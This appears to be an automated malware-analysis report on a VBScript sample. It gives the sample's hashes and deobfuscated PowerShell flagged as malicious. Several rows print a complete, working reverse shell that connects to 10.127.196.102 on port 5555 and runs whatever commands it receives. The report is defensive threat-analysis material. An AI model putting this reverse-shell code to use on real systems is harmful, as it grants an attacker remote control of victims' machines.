169c629f5c3d88484c39b01b9e4b07b7
VBScript | MD5: 169c629f5c3d88484c39b01b9e4b07b7 | Size: 1.56 KB | text/vbscript
|
Hash | Hash Value |
|---|---|
| MD5 | 169c629f5c3d88484c39b01b9e4b07b7
|
| Sha1 | 3814ec1531d8c5cd3d962edc44739d253fbd90a0
|
| Sha256 | 1a13844fde7e03e38b594ed0fb6c9aa99143e3d6c2ddf266b6969e1f2661121f
|
| Sha384 | 607c6e8cfb51d3136821e0e07f074c368f8563e2ee1f98dbec482c6a70e628afcb33f58921c17881078be914d8a9cf87
|
| Sha512 | f75c248a53bc2565af0f75eecf0573ae6d83e2e42c44dea3a4fc9ca66107ba9feb45109d25f17e8f2493233a38b65bf6da3e46d3d6cc789529a24794495d6e31
|
| SSDeep | 48:R5fPU//hhPAEjTlRMLtiUfG5ZSjHAUIq7hNp0w/:b8nhhPAEjRREgU+PSjHHbhNt
|
| TLSH | C6316DBDC836F8E4079E719094723D4520E8AA27C7744FBCFE4209AA5A147E4DF2998C
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $client = New-Object "System.Net.Sockets.TCPClient" @("10.127.196.102", 5555) $stream = $client."GetStream"() [byte[]] $bytes = 0 .. 65535 | ForEach-Object 0 while (($i = $stream."Read"($bytes, 0, $bytes."Length")) -ne 0) { $data = (New-Object -TypeName "System.Text.ASCIIEncoding")."GetString"($bytes, 0, $i) $sendback = (Invoke-Expression $data | Out-String) $sendback2 = $sendback + "PS " + (Get-Location)."Path" + "> " $sendbyte = ([Encoding]::"ASCII")."GetBytes"($sendback2) $stream."Write"($sendbyte, 0, $sendbyte."Length") $stream."Flush"() } $client."Close"() |
| Deobfuscated PowerShell | $client = New-Object "System.Net.Sockets.TCPClient" @("10.127.196.102", 5555) $stream = $client."GetStream"() [byte[]] $bytes = 0 .. 65535 | ForEach-Object 0 while (($i = $stream."Read"($bytes, 0, $bytes."Length")) -ne 0) { $data = (New-Object -TypeName "System.Text.ASCIIEncoding")."GetString"($bytes, 0, $i) $sendback = (Invoke-Expression $data | Out-String) $sendback2 = $sendback + "PS " + (Get-Location)."Path" + "> " $sendbyte = ([Encoding]::"ASCII")."GetBytes"($sendback2) $stream."Write"($sendbyte, 0, $sendbyte."Length") $stream."Flush"() } $client."Close"() |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false end "Sub" runps close < "/script></head><body></body></html>" |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $client = New-Object "System.Net.Sockets.TCPClient" @("10.127.196.102", 5555) $stream = $client."GetStream"() [byte[]] $bytes = 0 .. 65535 | ForEach-Object 0 while (($i = $stream."Read"($bytes, 0, $bytes."Length")) -ne 0) { $data = (New-Object -TypeName "System.Text.ASCIIEncoding")."GetString"($bytes, 0, $i) $sendback = (Invoke-Expression $data | Out-String) $sendback2 = $sendback + "PS " + (Get-Location)."Path" + "> " $sendbyte = ([Encoding]::"ASCII")."GetBytes"($sendback2) $stream."Write"($sendbyte, 0, $sendbyte."Length") $stream."Flush"() } $client."Close"() Malicious |
169c629f5c3d88484c39b01b9e4b07b7 > [Base64-Block] |
| Deobfuscated PowerShell | $client = New-Object "System.Net.Sockets.TCPClient" @("10.127.196.102", 5555) $stream = $client."GetStream"() [byte[]] $bytes = 0 .. 65535 | ForEach-Object 0 while (($i = $stream."Read"($bytes, 0, $bytes."Length")) -ne 0) { $data = (New-Object -TypeName "System.Text.ASCIIEncoding")."GetString"($bytes, 0, $i) $sendback = (Invoke-Expression $data | Out-String) $sendback2 = $sendback + "PS " + (Get-Location)."Path" + "> " $sendbyte = ([Encoding]::"ASCII")."GetBytes"($sendback2) $stream."Write"($sendbyte, 0, $sendbyte."Length") $stream."Flush"() } $client."Close"() Malicious |
169c629f5c3d88484c39b01b9e4b07b7 > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false end "Sub" runps close < "/script></head><body></body></html>" Malicious |
169c629f5c3d88484c39b01b9e4b07b7 > [PowerShell Command] |